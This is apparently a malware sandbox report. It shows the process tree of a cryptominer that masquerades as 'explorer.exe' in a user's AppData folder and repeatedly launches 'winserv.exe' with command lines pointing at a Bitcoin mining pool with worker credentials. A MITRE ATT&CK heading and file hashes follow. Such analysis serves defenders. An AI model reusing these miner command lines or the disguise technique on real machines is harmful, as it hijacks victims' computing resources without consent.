C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:916
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:564
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1000
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4640
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2264
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:6016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5952
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2844
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4588
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2108
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2136
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4236
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4476
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1876
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5980
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3888
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:404
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1592
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1220
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5992
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4988
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3548
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2740
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2484
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4836
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5856
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3428
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5180
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3572
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4888
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1076
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5516
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4636
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4464
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5260
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4356
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3160
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5140
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4696
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5056
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1468
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:576
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:436
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3896
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2728
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2600
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1460
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2536
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4544
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2980
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5304
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5776
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5560
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3200
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3568
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3320
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1992
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1580
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2468
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2916
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5724
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3104
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3060
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4976
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5760
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4848
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3356
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5732
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3448
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5372
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1632
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1456
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4956
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5032
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4248
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:464
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:6012
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5160
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5084
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4656
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3484
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4908
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5516
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4460
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:6124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1340
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5568
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3368
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2180
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4328
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2404
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3012
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5888
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:852
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2920
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1084
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4548
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3900
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:6008
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1000
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2340
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5440
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
48KB
MD5c4ad493a6bfd212c4e1418ba605020af
SHA120272ac81bd1df68603924ae3b1fe4c2df034a29
SHA256492bd918e98e5802cf1ff5d3f0537567a7657477fff9cb5e7657448f64ead496
SHA512736487e85b4986284139599befb69a3483108c6199e6737524aafad9daa8614e67ab244859d71affacbcebba8e07af91fb2c4c10484f7988fa7dacd51897ccaf